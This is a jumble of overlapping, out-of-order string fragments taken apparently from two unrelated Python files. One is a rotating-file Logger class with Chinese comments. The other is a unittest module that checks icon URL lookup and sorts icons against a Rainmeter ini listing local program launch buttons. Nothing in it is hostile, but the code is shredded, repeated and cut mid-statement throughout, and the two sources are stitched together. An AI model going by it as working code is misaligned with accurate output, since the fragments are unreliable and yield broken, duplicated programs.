logging.StreamHandler() sh.setFormatter(fmt) sh.setLevel(logLevel) # 文件日志 fh = logging.handlers.RotatingFileHandler(fileName, maxBytes=50*1024*1024,", "3 INFO = 4 DEBUG = 5 class Logger: def __init__(self, fileName, level=DEBUG):", "os.path.abspath(fileName) dir = os.path.dirname(abspath) if not os.path.exists(dir): os.makedirs(dir) self.logger = logging.getLogger(dir) self.logger.setLevel(logLevel) fmt", "def debug(self, message): self.logger.debug(message) def info(self, message): self.logger.info(message) def warn(self, message): self.logger.warn(message) def", "abspath = os.path.abspath(fileName) dir = os.path.dirname(abspath) if not os.path.exists(dir): os.makedirs(dir) self.logger = logging.getLogger(dir)", "import logging.handlers CRITICAL = 1 ERROR = 2 WARNING = 3 INFO =", "%(message)s') # 控制台日志 sh = logging.StreamHandler() sh.setFormatter(fmt) sh.setLevel(logLevel) # 文件日志 fh = logging.handlers.RotatingFileHandler(fileName,", "fh = 
logging.handlers.RotatingFileHandler(fileName, maxBytes=50*1024*1024, backupCount=20) fh.setFormatter(fmt) fh.setLevel(logLevel) self.logger.addHandler(fh) def debug(self, message): self.logger.debug(message) def", "os.path.dirname(abspath) if not os.path.exists(dir): os.makedirs(dir) self.logger = logging.getLogger(dir) self.logger.setLevel(logLevel) fmt = logging.Formatter('[%(asctime)s] [%(levelname)s]", "class Logger: def __init__(self, fileName, level=DEBUG): dictLevel = { CRITICAL: logging.CRITICAL, ERROR: logging.ERROR,", "= DEBUG logLevel = dictLevel[level] # mkdir abspath = os.path.abspath(fileName) dir = os.path.dirname(abspath)", "def critical(self, message): self.logger.critical(message) if __name__ == \"__main__\": logger = Logger('test.log', INFO) logger.debug('this", "= logging.StreamHandler() sh.setFormatter(fmt) sh.setLevel(logLevel) # 文件日志 fh = logging.handlers.RotatingFileHandler(fileName, maxBytes=50*1024*1024, backupCount=20) fh.setFormatter(fmt) fh.setLevel(logLevel)", "__name__ == \"__main__\": logger = Logger('test.log', INFO) logger.debug('this is a debug message') logger.info('this", "logger = Logger('test.log', INFO) logger.debug('this is a debug message') logger.info('this is a info", "def __init__(self, fileName, level=DEBUG): dictLevel = { CRITICAL: logging.CRITICAL, ERROR: logging.ERROR, WARNING: logging.WARNING,", "CRITICAL = 1 ERROR = 2 WARNING = 3 INFO = 4 DEBUG", "#!/usr/bin/env python # -*- coding: utf-8 -*- import os import logging import logging.handlers", "not os.path.exists(dir): os.makedirs(dir) self.logger = logging.getLogger(dir) self.logger.setLevel(logLevel) fmt = logging.Formatter('[%(asctime)s] [%(levelname)s] %(message)s') #", "DEBUG: logging.DEBUG } if level < CRITICAL or level > DEBUG: level =", "self.logger.error(message) def critical(self, message): self.logger.critical(message) if __name__ == \"__main__\": logger = Logger('test.log', INFO)", "logging import logging.handlers CRITICAL = 1 ERROR = 2 WARNING = 3 
INFO", "-*- coding: utf-8 -*- import os import logging import logging.handlers CRITICAL = 1", "logging.WARNING, INFO: logging.INFO, DEBUG: logging.DEBUG } if level < CRITICAL or level >", "控制台日志 sh = logging.StreamHandler() sh.setFormatter(fmt) sh.setLevel(logLevel) # 文件日志 fh = logging.handlers.RotatingFileHandler(fileName, maxBytes=50*1024*1024, backupCount=20)", "import os import logging import logging.handlers CRITICAL = 1 ERROR = 2 WARNING", "CRITICAL: logging.CRITICAL, ERROR: logging.ERROR, WARNING: logging.WARNING, INFO: logging.INFO, DEBUG: logging.DEBUG } if level", "debug(self, message): self.logger.debug(message) def info(self, message): self.logger.info(message) def warn(self, message): self.logger.warn(message) def error(self,", "backupCount=20) fh.setFormatter(fmt) fh.setLevel(logLevel) self.logger.addHandler(fh) def debug(self, message): self.logger.debug(message) def info(self, message): self.logger.info(message) def", "< CRITICAL or level > DEBUG: level = DEBUG logLevel = dictLevel[level] #", "logging.getLogger(dir) self.logger.setLevel(logLevel) fmt = logging.Formatter('[%(asctime)s] [%(levelname)s] %(message)s') # 控制台日志 sh = logging.StreamHandler() sh.setFormatter(fmt)", "文件日志 fh = logging.handlers.RotatingFileHandler(fileName, maxBytes=50*1024*1024, backupCount=20) fh.setFormatter(fmt) fh.setLevel(logLevel) self.logger.addHandler(fh) def debug(self, message): self.logger.debug(message)", "DEBUG: level = DEBUG logLevel = dictLevel[level] # mkdir abspath = os.path.abspath(fileName) dir", "critical(self, message): self.logger.critical(message) if __name__ == \"__main__\": logger = Logger('test.log', INFO) logger.debug('this is", "level = DEBUG logLevel = dictLevel[level] # mkdir abspath = os.path.abspath(fileName) dir =", "info(self, message): self.logger.info(message) def warn(self, message): self.logger.warn(message) def error(self, message): self.logger.error(message) def critical(self,", "self.logger.warn(message) def error(self, message): 
self.logger.error(message) def critical(self, message): self.logger.critical(message) if __name__ == \"__main__\":", "os.path.exists(dir): os.makedirs(dir) self.logger = logging.getLogger(dir) self.logger.setLevel(logLevel) fmt = logging.Formatter('[%(asctime)s] [%(levelname)s] %(message)s') # 控制台日志", "or level > DEBUG: level = DEBUG logLevel = dictLevel[level] # mkdir abspath", "sh.setFormatter(fmt) sh.setLevel(logLevel) # 文件日志 fh = logging.handlers.RotatingFileHandler(fileName, maxBytes=50*1024*1024, backupCount=20) fh.setFormatter(fmt) fh.setLevel(logLevel) self.logger.addHandler(fh) def", "self.logger.info(message) def warn(self, message): self.logger.warn(message) def error(self, message): self.logger.error(message) def critical(self, message): self.logger.critical(message)", "logging.Formatter('[%(asctime)s] [%(levelname)s] %(message)s') # 控制台日志 sh = logging.StreamHandler() sh.setFormatter(fmt) sh.setLevel(logLevel) # 文件日志 fh", "= 5 class Logger: def __init__(self, fileName, level=DEBUG): dictLevel = { CRITICAL: logging.CRITICAL,", "logging.handlers CRITICAL = 1 ERROR = 2 WARNING = 3 INFO = 4", "level > DEBUG: level = DEBUG logLevel = dictLevel[level] # mkdir abspath =", "2 WARNING = 3 INFO = 4 DEBUG = 5 class Logger: def", "python # -*- coding: utf-8 -*- import os import logging import logging.handlers CRITICAL", "__init__(self, fileName, level=DEBUG): dictLevel = { CRITICAL: logging.CRITICAL, ERROR: logging.ERROR, WARNING: logging.WARNING, INFO:", "def error(self, message): self.logger.error(message) def critical(self, message): self.logger.critical(message) if __name__ == \"__main__\": logger", "logging.DEBUG } if level < CRITICAL or level > DEBUG: level = DEBUG", "mkdir abspath = os.path.abspath(fileName) dir = os.path.dirname(abspath) if not os.path.exists(dir): os.makedirs(dir) self.logger =", "dir = os.path.dirname(abspath) if not os.path.exists(dir): os.makedirs(dir) self.logger = logging.getLogger(dir) self.logger.setLevel(logLevel) fmt =", "5 class 
Logger: def __init__(self, fileName, level=DEBUG): dictLevel = { CRITICAL: logging.CRITICAL, ERROR:", "\"__main__\": logger = Logger('test.log', INFO) logger.debug('this is a debug message') logger.info('this is a", "Logger('test.log', INFO) logger.debug('this is a debug message') logger.info('this is a info message') logger.warn('this", "= os.path.dirname(abspath) if not os.path.exists(dir): os.makedirs(dir) self.logger = logging.getLogger(dir) self.logger.setLevel(logLevel) fmt = logging.Formatter('[%(asctime)s]", "{ CRITICAL: logging.CRITICAL, ERROR: logging.ERROR, WARNING: logging.WARNING, INFO: logging.INFO, DEBUG: logging.DEBUG } if", "= 2 WARNING = 3 INFO = 4 DEBUG = 5 class Logger:", "import logging import logging.handlers CRITICAL = 1 ERROR = 2 WARNING = 3", "DEBUG = 5 class Logger: def __init__(self, fileName, level=DEBUG): dictLevel = { CRITICAL:", "fmt = logging.Formatter('[%(asctime)s] [%(levelname)s] %(message)s') # 控制台日志 sh = logging.StreamHandler() sh.setFormatter(fmt) sh.setLevel(logLevel) #", "fileName, level=DEBUG): dictLevel = { CRITICAL: logging.CRITICAL, ERROR: logging.ERROR, WARNING: logging.WARNING, INFO: logging.INFO,", "= logging.Formatter('[%(asctime)s] [%(levelname)s] %(message)s') # 控制台日志 sh = logging.StreamHandler() sh.setFormatter(fmt) sh.setLevel(logLevel) # 文件日志", "= 1 ERROR = 2 WARNING = 3 INFO = 4 DEBUG =", "fh.setFormatter(fmt) fh.setLevel(logLevel) self.logger.addHandler(fh) def debug(self, message): self.logger.debug(message) def info(self, message): self.logger.info(message) def warn(self,", "logging.ERROR, WARNING: logging.WARNING, INFO: logging.INFO, DEBUG: logging.DEBUG } if level < CRITICAL or", "a debug message') logger.info('this is a info message') logger.warn('this is a warn message')", "ERROR: logging.ERROR, WARNING: logging.WARNING, INFO: logging.INFO, DEBUG: logging.DEBUG } if level < CRITICAL", "self.logger = logging.getLogger(dir) self.logger.setLevel(logLevel) fmt = logging.Formatter('[%(asctime)s] 
[%(levelname)s] %(message)s') # 控制台日志 sh =", "DEBUG logLevel = dictLevel[level] # mkdir abspath = os.path.abspath(fileName) dir = os.path.dirname(abspath) if", "warn(self, message): self.logger.warn(message) def error(self, message): self.logger.error(message) def critical(self, message): self.logger.critical(message) if __name__", "= logging.handlers.RotatingFileHandler(fileName, maxBytes=50*1024*1024, backupCount=20) fh.setFormatter(fmt) fh.setLevel(logLevel) self.logger.addHandler(fh) def debug(self, message): self.logger.debug(message) def info(self,", "fh.setLevel(logLevel) self.logger.addHandler(fh) def debug(self, message): self.logger.debug(message) def info(self, message): self.logger.info(message) def warn(self, message):", "== \"__main__\": logger = Logger('test.log', INFO) logger.debug('this is a debug message') logger.info('this is", "message): self.logger.critical(message) if __name__ == \"__main__\": logger = Logger('test.log', INFO) logger.debug('this is a", "WARNING: logging.WARNING, INFO: logging.INFO, DEBUG: logging.DEBUG } if level < CRITICAL or level", "message): self.logger.debug(message) def info(self, message): self.logger.info(message) def warn(self, message): self.logger.warn(message) def error(self, message):", "is a debug message') logger.info('this is a info message') logger.warn('this is a warn", "# 文件日志 fh = logging.handlers.RotatingFileHandler(fileName, maxBytes=50*1024*1024, backupCount=20) fh.setFormatter(fmt) fh.setLevel(logLevel) self.logger.addHandler(fh) def debug(self, message):", "if __name__ == \"__main__\": logger = Logger('test.log', INFO) logger.debug('this is a debug message')", "level=DEBUG): dictLevel = { CRITICAL: logging.CRITICAL, ERROR: logging.ERROR, WARNING: logging.WARNING, INFO: logging.INFO, DEBUG:", "} if level < CRITICAL or level > DEBUG: level = DEBUG logLevel", "[%(levelname)s] %(message)s') # 控制台日志 sh = logging.StreamHandler() sh.setFormatter(fmt) sh.setLevel(logLevel) # 文件日志 fh =", "maxBytes=50*1024*1024, 
backupCount=20) fh.setFormatter(fmt) fh.setLevel(logLevel) self.logger.addHandler(fh) def debug(self, message): self.logger.debug(message) def info(self, message): self.logger.info(message)", "sh.setLevel(logLevel) # 文件日志 fh = logging.handlers.RotatingFileHandler(fileName, maxBytes=50*1024*1024, backupCount=20) fh.setFormatter(fmt) fh.setLevel(logLevel) self.logger.addHandler(fh) def debug(self,", "self.logger.addHandler(fh) def debug(self, message): self.logger.debug(message) def info(self, message): self.logger.info(message) def warn(self, message): self.logger.warn(message)", "message): self.logger.info(message) def warn(self, message): self.logger.warn(message) def error(self, message): self.logger.error(message) def critical(self, message):", "message): self.logger.error(message) def critical(self, message): self.logger.critical(message) if __name__ == \"__main__\": logger = Logger('test.log',", "WARNING = 3 INFO = 4 DEBUG = 5 class Logger: def __init__(self,", "= os.path.abspath(fileName) dir = os.path.dirname(abspath) if not os.path.exists(dir): os.makedirs(dir) self.logger = logging.getLogger(dir) self.logger.setLevel(logLevel)" ]
[ "import matplotlib.pyplot as plt import numpy as np nus_lpf,mu_lpf=np.load(\"clpf.npz\",allow_pickle=True)[\"arr_0\"] nus_modit,mu_modit=np.load(\"cmodit4500.npz\",allow_pickle=True)[\"arr_0\"] fig=plt.figure(figsize=(8,4)) plt.plot(nus_modit,mu_modit,label=\"MODIT\",color=\"C1\") plt.plot(nus_lpf,mu_lpf,label=\"DIRECT\",ls=\"dashed\",color=\"C0\")", "plt import numpy as np nus_lpf,mu_lpf=np.load(\"clpf.npz\",allow_pickle=True)[\"arr_0\"] nus_modit,mu_modit=np.load(\"cmodit4500.npz\",allow_pickle=True)[\"arr_0\"] fig=plt.figure(figsize=(8,4)) plt.plot(nus_modit,mu_modit,label=\"MODIT\",color=\"C1\") plt.plot(nus_lpf,mu_lpf,label=\"DIRECT\",ls=\"dashed\",color=\"C0\") plt.xlabel(\"wavenumber (cm-1)\") plt.ylabel(\"spectrum\")", "numpy as np nus_lpf,mu_lpf=np.load(\"clpf.npz\",allow_pickle=True)[\"arr_0\"] nus_modit,mu_modit=np.load(\"cmodit4500.npz\",allow_pickle=True)[\"arr_0\"] fig=plt.figure(figsize=(8,4)) plt.plot(nus_modit,mu_modit,label=\"MODIT\",color=\"C1\") plt.plot(nus_lpf,mu_lpf,label=\"DIRECT\",ls=\"dashed\",color=\"C0\") plt.xlabel(\"wavenumber (cm-1)\") plt.ylabel(\"spectrum\") plt.legend() plt.savefig(\"compspec_luhman16A.png\")", "import numpy as np nus_lpf,mu_lpf=np.load(\"clpf.npz\",allow_pickle=True)[\"arr_0\"] nus_modit,mu_modit=np.load(\"cmodit4500.npz\",allow_pickle=True)[\"arr_0\"] fig=plt.figure(figsize=(8,4)) plt.plot(nus_modit,mu_modit,label=\"MODIT\",color=\"C1\") plt.plot(nus_lpf,mu_lpf,label=\"DIRECT\",ls=\"dashed\",color=\"C0\") plt.xlabel(\"wavenumber (cm-1)\") plt.ylabel(\"spectrum\") plt.legend()", "matplotlib.pyplot as plt import numpy as np nus_lpf,mu_lpf=np.load(\"clpf.npz\",allow_pickle=True)[\"arr_0\"] nus_modit,mu_modit=np.load(\"cmodit4500.npz\",allow_pickle=True)[\"arr_0\"] fig=plt.figure(figsize=(8,4)) plt.plot(nus_modit,mu_modit,label=\"MODIT\",color=\"C1\") plt.plot(nus_lpf,mu_lpf,label=\"DIRECT\",ls=\"dashed\",color=\"C0\") plt.xlabel(\"wavenumber", "as np 
nus_lpf,mu_lpf=np.load(\"clpf.npz\",allow_pickle=True)[\"arr_0\"] nus_modit,mu_modit=np.load(\"cmodit4500.npz\",allow_pickle=True)[\"arr_0\"] fig=plt.figure(figsize=(8,4)) plt.plot(nus_modit,mu_modit,label=\"MODIT\",color=\"C1\") plt.plot(nus_lpf,mu_lpf,label=\"DIRECT\",ls=\"dashed\",color=\"C0\") plt.xlabel(\"wavenumber (cm-1)\") plt.ylabel(\"spectrum\") plt.legend() plt.savefig(\"compspec_luhman16A.png\") plt.show()", "as plt import numpy as np nus_lpf,mu_lpf=np.load(\"clpf.npz\",allow_pickle=True)[\"arr_0\"] nus_modit,mu_modit=np.load(\"cmodit4500.npz\",allow_pickle=True)[\"arr_0\"] fig=plt.figure(figsize=(8,4)) plt.plot(nus_modit,mu_modit,label=\"MODIT\",color=\"C1\") plt.plot(nus_lpf,mu_lpf,label=\"DIRECT\",ls=\"dashed\",color=\"C0\") plt.xlabel(\"wavenumber (cm-1)\")" ]
[ "= [iconmanager.IconManager(name=icon_name, image_save_path=\".\", app_path=\".\") for icon_name in icon_names] correctly_sorted_names = [\"new program\", \"video", "import unittest import mainutils import iconmanager test_ini = \"\"\" [Rainmeter] Author=<EMAIL>.<EMAIL>.<EMAIL> Name=Mid Dock", "[MeasureBin] Measure=Plugin Plugin=RecycleManager.dll RecycleType=COUNT Drives=ALL [MeasureBin2] Measure=Plugin Plugin=RecycleManager.dll RecycleType=SIZE Drives=ALL [BinAction] Measure=Calc Formula=MeasureBin", "import iconmanager test_ini = \"\"\" [Rainmeter] Author=<EMAIL>.<EMAIL>.<EMAIL> Name=Mid Dock ------------------------------------------------------------------------ ;Metadata added by", "\"movie maker\", \"Terraria\"] icons = mainutils.sort_by_ini(icons, ini_str=test_ini) for correct_name, actual_icon in zip(correctly_sorted_names, icons):", "APPLICATIONS [video editor] Meter=Button Y=2R ButtonImage=\"E:\\Desktop\\Test junk\\video editor icon.png\" ButtonCommand=!execute [\"E:\\Desktop\\Test junk\\video editor.exe\"]", "Measure=Plugin Plugin=RecycleManager.dll RecycleType=SIZE Drives=ALL [BinAction] Measure=Calc Formula=MeasureBin IfAboveAction=!execute [!RainmeterHideMeter IconEmpty][!RainmeterShowMeter IconFull] IfAboveValue=0 IfEqualAction=!execute", "[\"Terraria\", \"movie maker\", \"video editor\", \"stackoverflow help\", \"new program\"] icons = [iconmanager.IconManager(name=icon_name, image_save_path=\".\",", "T(\"minecraft\") assert T(\"Dota 2\") assert T(\"Photoshop\") def test_sorting_by_ini(self): icon_names = [\"Terraria\", \"movie maker\",", "added by RainBrowser ;http://rainmeter.net/RainCMS/?q=Rainmeter101_AnatomyOfASkin [Metadata] Name= Config= Description= Instructions= Version= Tags= License= Variant=", "class SmokeTests(unittest.TestCase): def test_get_urls(self): T = icon_get.get_urls assert T(\"minecraft\") assert T(\"Dota 2\") assert", "RainBrowser ;http://rainmeter.net/RainCMS/?q=Rainmeter101_AnatomyOfASkin [Metadata] Name= Config= 
Description= Instructions= Version= Tags= License= Variant= Preview= ;End", "IconFull] IfAboveValue=0 IfEqualAction=!execute [!RainmeterHideMeter IconFull][!RainmeterShowMeter IconEmpty] IfEqualValue=0 ;--------------------------------------------------------------------------- ; APPLICATIONS [video editor] Meter=Button", "import mainutils import iconmanager test_ini = \"\"\" [Rainmeter] Author=<EMAIL>.<EMAIL>.<EMAIL> Name=Mid Dock ------------------------------------------------------------------------ ;Metadata", "program\"] icons = [iconmanager.IconManager(name=icon_name, image_save_path=\".\", app_path=\".\") for icon_name in icon_names] correctly_sorted_names = [\"new", "Meter=Button Y=2R ButtonImage=\"E:\\Desktop\\Test junk\\video editor icon.png\" ButtonCommand=!execute [\"E:\\Desktop\\Test junk\\video editor.exe\"] [stackoverflow help] Meter=Button", "Description= Instructions= Version= Tags= License= Variant= Preview= ;End of added Metadata ;----------------------------------------------------------------------- ;", "help\", \"new program\"] icons = [iconmanager.IconManager(name=icon_name, image_save_path=\".\", app_path=\".\") for icon_name in icon_names] correctly_sorted_names", "assert T(\"Photoshop\") def test_sorting_by_ini(self): icon_names = [\"Terraria\", \"movie maker\", \"video editor\", \"stackoverflow help\",", "IconEmpty][!RainmeterShowMeter IconFull] IfAboveValue=0 IfEqualAction=!execute [!RainmeterHideMeter IconFull][!RainmeterShowMeter IconEmpty] IfEqualValue=0 ;--------------------------------------------------------------------------- ; APPLICATIONS [video editor]", "icon.png\" ButtonCommand=!execute [\"E:\\Desktop\\Test junk\\video editor.exe\"] [stackoverflow help] Meter=Button Y=2R ButtonImage=\"E:\\Desktop\\Test junk\\stackoverflow help icon.png\"", "\"video editor\", \"stackoverflow help\", \"new program\"] icons = [iconmanager.IconManager(name=icon_name, image_save_path=\".\", app_path=\".\") for icon_name", 
"Plugin=RecycleManager.dll RecycleType=SIZE Drives=ALL [BinAction] Measure=Calc Formula=MeasureBin IfAboveAction=!execute [!RainmeterHideMeter IconEmpty][!RainmeterShowMeter IconFull] IfAboveValue=0 IfEqualAction=!execute [!RainmeterHideMeter", "help icon.png\" ButtonCommand=!execute [\"E:\\Desktop\\Test junk\\stackoverflow help.exe\"] [movie maker] Meter=Button Y=2R ButtonImage=\"E:\\Desktop\\Test junk\\movie maker", "[\"new program\", \"video editor\", \"stackoverflow help\", \"movie maker\", \"Terraria\"] icons = mainutils.sort_by_ini(icons, ini_str=test_ini)", "test_get_urls(self): T = icon_get.get_urls assert T(\"minecraft\") assert T(\"Dota 2\") assert T(\"Photoshop\") def test_sorting_by_ini(self):", "app_path=\".\") for icon_name in icon_names] correctly_sorted_names = [\"new program\", \"video editor\", \"stackoverflow help\",", "\"new program\"] icons = [iconmanager.IconManager(name=icon_name, image_save_path=\".\", app_path=\".\") for icon_name in icon_names] correctly_sorted_names =", "Y=2R ButtonImage=\"E:\\Desktop\\Test junk\\Terraria icon.png\" ButtonCommand=!execute [\"E:\\Desktop\\Test junk\\Terraria.url\"]\"\"\" class SmokeTests(unittest.TestCase): def test_get_urls(self): T =", "[\"E:\\Desktop\\Test junk\\Terraria.url\"]\"\"\" class SmokeTests(unittest.TestCase): def test_get_urls(self): T = icon_get.get_urls assert T(\"minecraft\") assert T(\"Dota", "Name= Config= Description= Instructions= Version= Tags= License= Variant= Preview= ;End of added Metadata", "RecycleType=COUNT Drives=ALL [MeasureBin2] Measure=Plugin Plugin=RecycleManager.dll RecycleType=SIZE Drives=ALL [BinAction] Measure=Calc Formula=MeasureBin IfAboveAction=!execute [!RainmeterHideMeter IconEmpty][!RainmeterShowMeter", "editor icon.png\" ButtonCommand=!execute [\"E:\\Desktop\\Test junk\\video editor.exe\"] [stackoverflow help] Meter=Button Y=2R ButtonImage=\"E:\\Desktop\\Test junk\\stackoverflow help", "icon_names = [\"Terraria\", \"movie maker\", \"video editor\", 
\"stackoverflow help\", \"new program\"] icons =", "Plugin=Plugins\\PowerPlugin.dll PowerState=PERCENT [MeasureBin] Measure=Plugin Plugin=RecycleManager.dll RecycleType=COUNT Drives=ALL [MeasureBin2] Measure=Plugin Plugin=RecycleManager.dll RecycleType=SIZE Drives=ALL [BinAction]", "[iconmanager.IconManager(name=icon_name, image_save_path=\".\", app_path=\".\") for icon_name in icon_names] correctly_sorted_names = [\"new program\", \"video editor\",", "by RainBrowser ;http://rainmeter.net/RainCMS/?q=Rainmeter101_AnatomyOfASkin [Metadata] Name= Config= Description= Instructions= Version= Tags= License= Variant= Preview=", "------------------------------------------------------------------------ ;Metadata added by RainBrowser ;http://rainmeter.net/RainCMS/?q=Rainmeter101_AnatomyOfASkin [Metadata] Name= Config= Description= Instructions= Version= Tags=", "Name=Mid Dock ------------------------------------------------------------------------ ;Metadata added by RainBrowser ;http://rainmeter.net/RainCMS/?q=Rainmeter101_AnatomyOfASkin [Metadata] Name= Config= Description= Instructions=", "SmokeTests(unittest.TestCase): def test_get_urls(self): T = icon_get.get_urls assert T(\"minecraft\") assert T(\"Dota 2\") assert T(\"Photoshop\")", "iconmanager test_ini = \"\"\" [Rainmeter] Author=<EMAIL>.<EMAIL>.<EMAIL> Name=Mid Dock ------------------------------------------------------------------------ ;Metadata added by RainBrowser", ";End of added Metadata ;----------------------------------------------------------------------- ; MEASURES MEASURES [MeasurePower] Measure=Plugin Plugin=Plugins\\PowerPlugin.dll PowerState=PERCENT [MeasureBin]", "RecycleType=SIZE Drives=ALL [BinAction] Measure=Calc Formula=MeasureBin IfAboveAction=!execute [!RainmeterHideMeter IconEmpty][!RainmeterShowMeter IconFull] IfAboveValue=0 IfEqualAction=!execute [!RainmeterHideMeter IconFull][!RainmeterShowMeter", "Formula=MeasureBin IfAboveAction=!execute [!RainmeterHideMeter IconEmpty][!RainmeterShowMeter 
IconFull] IfAboveValue=0 IfEqualAction=!execute [!RainmeterHideMeter IconFull][!RainmeterShowMeter IconEmpty] IfEqualValue=0 ;--------------------------------------------------------------------------- ;", "ButtonCommand=!execute [\"E:\\Desktop\\Test junk\\stackoverflow help.exe\"] [movie maker] Meter=Button Y=2R ButtonImage=\"E:\\Desktop\\Test junk\\movie maker icon.png\" ButtonCommand=!execute", "Measure=Calc Formula=MeasureBin IfAboveAction=!execute [!RainmeterHideMeter IconEmpty][!RainmeterShowMeter IconFull] IfAboveValue=0 IfEqualAction=!execute [!RainmeterHideMeter IconFull][!RainmeterShowMeter IconEmpty] IfEqualValue=0 ;---------------------------------------------------------------------------", "junk\\movie maker icon.png\" ButtonCommand=!execute [\"E:\\Desktop\\Test junk\\movie maker.exe\"] [Terraria] Meter=Button Y=2R ButtonImage=\"E:\\Desktop\\Test junk\\Terraria icon.png\"", ";--------------------------------------------------------------------------- ; APPLICATIONS [video editor] Meter=Button Y=2R ButtonImage=\"E:\\Desktop\\Test junk\\video editor icon.png\" ButtonCommand=!execute [\"E:\\Desktop\\Test", "junk\\movie maker.exe\"] [Terraria] Meter=Button Y=2R ButtonImage=\"E:\\Desktop\\Test junk\\Terraria icon.png\" ButtonCommand=!execute [\"E:\\Desktop\\Test junk\\Terraria.url\"]\"\"\" class SmokeTests(unittest.TestCase):", "test_ini = \"\"\" [Rainmeter] Author=<EMAIL>.<EMAIL>.<EMAIL> Name=Mid Dock ------------------------------------------------------------------------ ;Metadata added by RainBrowser ;http://rainmeter.net/RainCMS/?q=Rainmeter101_AnatomyOfASkin", "[stackoverflow help] Meter=Button Y=2R ButtonImage=\"E:\\Desktop\\Test junk\\stackoverflow help icon.png\" ButtonCommand=!execute [\"E:\\Desktop\\Test junk\\stackoverflow help.exe\"] [movie", "\"Terraria\"] icons = mainutils.sort_by_ini(icons, ini_str=test_ini) for correct_name, actual_icon in zip(correctly_sorted_names, icons): assert actual_icon.name", "Version= Tags= License= Variant= 
Preview= ;End of added Metadata ;----------------------------------------------------------------------- ; MEASURES MEASURES", "Preview= ;End of added Metadata ;----------------------------------------------------------------------- ; MEASURES MEASURES [MeasurePower] Measure=Plugin Plugin=Plugins\\PowerPlugin.dll PowerState=PERCENT", "def test_get_urls(self): T = icon_get.get_urls assert T(\"minecraft\") assert T(\"Dota 2\") assert T(\"Photoshop\") def", "= [\"Terraria\", \"movie maker\", \"video editor\", \"stackoverflow help\", \"new program\"] icons = [iconmanager.IconManager(name=icon_name,", "Instructions= Version= Tags= License= Variant= Preview= ;End of added Metadata ;----------------------------------------------------------------------- ; MEASURES", "\"stackoverflow help\", \"new program\"] icons = [iconmanager.IconManager(name=icon_name, image_save_path=\".\", app_path=\".\") for icon_name in icon_names]", "IfAboveAction=!execute [!RainmeterHideMeter IconEmpty][!RainmeterShowMeter IconFull] IfAboveValue=0 IfEqualAction=!execute [!RainmeterHideMeter IconFull][!RainmeterShowMeter IconEmpty] IfEqualValue=0 ;--------------------------------------------------------------------------- ; APPLICATIONS", "icon_get import unittest import mainutils import iconmanager test_ini = \"\"\" [Rainmeter] Author=<EMAIL>.<EMAIL>.<EMAIL> Name=Mid", "[\"E:\\Desktop\\Test junk\\video editor.exe\"] [stackoverflow help] Meter=Button Y=2R ButtonImage=\"E:\\Desktop\\Test junk\\stackoverflow help icon.png\" ButtonCommand=!execute [\"E:\\Desktop\\Test", "[\"E:\\Desktop\\Test junk\\stackoverflow help.exe\"] [movie maker] Meter=Button Y=2R ButtonImage=\"E:\\Desktop\\Test junk\\movie maker icon.png\" ButtonCommand=!execute [\"E:\\Desktop\\Test", "icons = [iconmanager.IconManager(name=icon_name, image_save_path=\".\", app_path=\".\") for icon_name in icon_names] correctly_sorted_names = [\"new program\",", "[video editor] Meter=Button Y=2R ButtonImage=\"E:\\Desktop\\Test junk\\video 
editor icon.png\" ButtonCommand=!execute [\"E:\\Desktop\\Test junk\\video editor.exe\"] [stackoverflow", "Plugin=RecycleManager.dll RecycleType=COUNT Drives=ALL [MeasureBin2] Measure=Plugin Plugin=RecycleManager.dll RecycleType=SIZE Drives=ALL [BinAction] Measure=Calc Formula=MeasureBin IfAboveAction=!execute [!RainmeterHideMeter", "\"\"\" [Rainmeter] Author=<EMAIL>.<EMAIL>.<EMAIL> Name=Mid Dock ------------------------------------------------------------------------ ;Metadata added by RainBrowser ;http://rainmeter.net/RainCMS/?q=Rainmeter101_AnatomyOfASkin [Metadata] Name=", "test_sorting_by_ini(self): icon_names = [\"Terraria\", \"movie maker\", \"video editor\", \"stackoverflow help\", \"new program\"] icons", "def test_sorting_by_ini(self): icon_names = [\"Terraria\", \"movie maker\", \"video editor\", \"stackoverflow help\", \"new program\"]", ";http://rainmeter.net/RainCMS/?q=Rainmeter101_AnatomyOfASkin [Metadata] Name= Config= Description= Instructions= Version= Tags= License= Variant= Preview= ;End of", "Y=2R ButtonImage=\"E:\\Desktop\\Test junk\\video editor icon.png\" ButtonCommand=!execute [\"E:\\Desktop\\Test junk\\video editor.exe\"] [stackoverflow help] Meter=Button Y=2R", "= icon_get.get_urls assert T(\"minecraft\") assert T(\"Dota 2\") assert T(\"Photoshop\") def test_sorting_by_ini(self): icon_names =", "[Terraria] Meter=Button Y=2R ButtonImage=\"E:\\Desktop\\Test junk\\Terraria icon.png\" ButtonCommand=!execute [\"E:\\Desktop\\Test junk\\Terraria.url\"]\"\"\" class SmokeTests(unittest.TestCase): def test_get_urls(self):", "icons = mainutils.sort_by_ini(icons, ini_str=test_ini) for correct_name, actual_icon in zip(correctly_sorted_names, icons): assert actual_icon.name ==", "Config= Description= Instructions= Version= Tags= License= Variant= Preview= ;End of added Metadata ;-----------------------------------------------------------------------", "ButtonImage=\"E:\\Desktop\\Test junk\\video editor icon.png\" ButtonCommand=!execute 
[\"E:\\Desktop\\Test junk\\video editor.exe\"] [stackoverflow help] Meter=Button Y=2R ButtonImage=\"E:\\Desktop\\Test", "junk\\stackoverflow help.exe\"] [movie maker] Meter=Button Y=2R ButtonImage=\"E:\\Desktop\\Test junk\\movie maker icon.png\" ButtonCommand=!execute [\"E:\\Desktop\\Test junk\\movie", "junk\\stackoverflow help icon.png\" ButtonCommand=!execute [\"E:\\Desktop\\Test junk\\stackoverflow help.exe\"] [movie maker] Meter=Button Y=2R ButtonImage=\"E:\\Desktop\\Test junk\\movie", "junk\\video editor.exe\"] [stackoverflow help] Meter=Button Y=2R ButtonImage=\"E:\\Desktop\\Test junk\\stackoverflow help icon.png\" ButtonCommand=!execute [\"E:\\Desktop\\Test junk\\stackoverflow", "[BinAction] Measure=Calc Formula=MeasureBin IfAboveAction=!execute [!RainmeterHideMeter IconEmpty][!RainmeterShowMeter IconFull] IfAboveValue=0 IfEqualAction=!execute [!RainmeterHideMeter IconFull][!RainmeterShowMeter IconEmpty] IfEqualValue=0", "maker icon.png\" ButtonCommand=!execute [\"E:\\Desktop\\Test junk\\movie maker.exe\"] [Terraria] Meter=Button Y=2R ButtonImage=\"E:\\Desktop\\Test junk\\Terraria icon.png\" ButtonCommand=!execute", "mainutils import iconmanager test_ini = \"\"\" [Rainmeter] Author=<EMAIL>.<EMAIL>.<EMAIL> Name=Mid Dock ------------------------------------------------------------------------ ;Metadata added", "maker\", \"video editor\", \"stackoverflow help\", \"new program\"] icons = 